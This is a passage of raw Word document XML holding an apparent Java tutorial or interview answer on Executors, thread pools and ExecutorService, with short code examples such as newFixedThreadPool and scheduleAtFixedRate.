        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="269"/>
    </w:p>
    <w:p w14:paraId="429831D1" w14:textId="46CE51D5" w:rsidR="002D1F4E" w:rsidRPr="004E218C" w:rsidRDefault="002D1F4E" w:rsidP="004E218C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">In Java, </w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Executors</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are part of the </w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>java.util.concurrent</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> package and are used to manage and control thread execution in a more efficient and flexible way. The significance of Executors lies in their ability to decouple task submission from the details of how each task will be executed, such as the number of threads used, scheduling, and management.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63BC08A6"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Here’s a breakdown of the significance and usage of Executors:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA4AD75" w14:textId="77777777" w:rsidR="002D1F4E" w:rsidRPr="004E218C" w:rsidRDefault="002D1F4E"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Key Points of Executors:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9F4396" w14:textId="77777777" w:rsidR="002D1F4E" w:rsidRPr="004E218C" w:rsidRDefault="002D1F4E" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1126"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Task Management</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F0A26B" w14:textId="77777777" w:rsidR="002D1F4E" w:rsidRPr="004E218C" w:rsidRDefault="002D1F4E" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1126"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Executors provide a higher-level replacement for manually managing threads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05939CF2" w14:textId="77777777" w:rsidR="002D1F4E" w:rsidRPr="004E218C" w:rsidRDefault="002D1F4E" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1126"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>You submit tasks (usually instances of Runnable or Callable) to the executor instead of creating new threads directly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF89AA0" w14:textId="77777777" w:rsidR="002D1F4E" w:rsidRPr="004E218C" w:rsidRDefault="002D1F4E" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1126"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>This decouples the code that performs the task from the code that manages threads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E50B421" w14:textId="77777777" w:rsidR="002D1F4E" w:rsidRPr="004E218C" w:rsidRDefault="002D1F4E" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1126"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Thread Pool Management</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="791B452E" w14:textId="77777777" w:rsidR="002D1F4E" w:rsidRPr="004E218C" w:rsidRDefault="002D1F4E" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1126"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Executors can manage a pool of threads for task execution, which can help improve performance by reusing existing threads instead of creating new ones each time a task is executed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2639E4D5" w14:textId="77777777" w:rsidR="002D1F4E" w:rsidRPr="004E218C" w:rsidRDefault="002D1F4E" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1126"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Thread pools reduce the overhead of thread creation and destruction, thus optimizing the system's resource usage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="160C813E" w14:textId="77777777" w:rsidR="002D1F4E" w:rsidRPr="004E218C" w:rsidRDefault="002D1F4E" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1126"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Executors automatically handle the thread lifecycle (thread creation, re-use, and termination), making thread management easier.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C6F466" w14:textId="77777777" w:rsidR="002D1F4E" w:rsidRPr="004E218C" w:rsidRDefault="002D1F4E" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1126"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Task Scheduling</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="039AD4D6" w14:textId="77777777" w:rsidR="002D1F4E" w:rsidRPr="004E218C" w:rsidRDefault="002D1F4E" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1126"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Executors can schedule tasks for execution after a delay or periodically. For example, you can use an executor to schedule tasks that need to run periodically, such as in a background service or job scheduler.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E3B8E2" w14:textId="77777777" w:rsidR="002D1F4E" w:rsidRPr="004E218C" w:rsidRDefault="002D1F4E" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1126"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Concurrency Management</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C389735" w14:textId="77777777" w:rsidR="002D1F4E" w:rsidRPr="004E218C" w:rsidRDefault="002D1F4E" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1126"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Executors allow you to manage concurrent tasks in a more efficient and scalable way. Instead of manually managing threads and synchronization, you rely on executor services to handle task queuing, execution, and lifecycle management.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="520DB5AD" w14:textId="77777777" w:rsidR="002D1F4E" w:rsidRPr="004E218C" w:rsidRDefault="002D1F4E" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1126"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Asynchronous Execution</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72FF9D90" w14:textId="77777777" w:rsidR="002D1F4E" w:rsidRPr="004E218C" w:rsidRDefault="002D1F4E" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1126"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Executors provide a way to execute tasks asynchronously, meaning tasks can run concurrently without blocking the main thread. The ExecutorService.submit() method returns a Future object that can be used to track the completion of the task and retrieve its result, if applicable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534C96D8" w14:textId="77777777" w:rsidR="002D1F4E" w:rsidRPr="004E218C" w:rsidRDefault="002D1F4E" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1126"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Error Handling</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C43CE49" w14:textId="77777777" w:rsidR="002D1F4E" w:rsidRPr="004E218C" w:rsidRDefault="002D1F4E" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1126"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Executors handle exceptions thrown during task execution. If a task fails (i.e., it throws an exception), the executor framework can capture and process that exception, making error handling more manageable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="104D9CFD" w14:textId="77777777" w:rsidR="002D1F4E" w:rsidRPr="004E218C" w:rsidRDefault="002D1F4E"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Types of Executors:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C8C60EB" w14:textId="77777777" w:rsidR="002D1F4E" w:rsidRPr="004E218C" w:rsidRDefault="002D1F4E" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1127"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Executor</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The most basic interface that defines methods for task submission. It only provides the execute() method, which takes a Runnable task.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006EC408"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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34632446"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Executor executor = Executors.newFixedThreadPool(10);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A736234"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executor.execute(new RunnableTask());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="178B42E4" w14:textId="77777777" w:rsidR="002D1F4E" w:rsidRPr="004E218C" w:rsidRDefault="002D1F4E" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1127"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ExecutorService</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Extends the Executor interface and adds more methods for managing task submission, such as submit(), shutdown(), invokeAll(), and invokeAny(). It also provides support for graceful shutdown and retrieving the results of asynchronous tasks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5491E677"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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C434190"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ExecutorService executorService = Executors.newFixedThreadPool(10);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B372574"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Future&lt;?&gt; future = executorService.submit(new CallableTask());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA49B99"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executorService.shutdown();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF208DC" w14:textId="77777777" w:rsidR="002D1F4E" w:rsidRPr="004E218C" w:rsidRDefault="002D1F4E" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1127"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ScheduledExecutorService</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Extends ExecutorService and adds methods to schedule tasks to run after a fixed delay or periodically. It is ideal for tasks that need to be executed at regular intervals.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="664AB650"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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B410576"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ScheduledExecutorService scheduledExecutorService = Executors.newScheduledThreadPool(10);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="687B5702"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scheduledExecutorService.scheduleAtFixedRate(new RunnableTask(), 0, 1, TimeUnit.SECONDS);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC5CB14" w14:textId="77777777" w:rsidR="002D1F4E" w:rsidRPr="004E218C" w:rsidRDefault="002D1F4E"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Common Executor Implementations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="650CB8EC" w14:textId="77777777" w:rsidR="002D1F4E" w:rsidRPr="004E218C" w:rsidRDefault="002D1F4E" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1128"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>newFixedThreadPool(int nThreads)</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="341F1CD6" w14:textId="77777777" w:rsidR="002D1F4E" w:rsidRPr="004E218C" w:rsidRDefault="002D1F4E" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1128"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Creates a thread pool with a fixed number of threads. If all threads are busy, new tasks will be queued until a thread becomes available.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A2152F" w14:textId="77777777" w:rsidR="002D1F4E" w:rsidRPr="004E218C" w:rsidRDefault="002D1F4E" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1128"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Useful for limiting the number of concurrent threads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1384F0" w14:textId="77777777" w:rsidR="002D1F4E" w:rsidRPr="004E218C" w:rsidRDefault="002D1F4E" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1128"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>newCachedThreadPool()</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
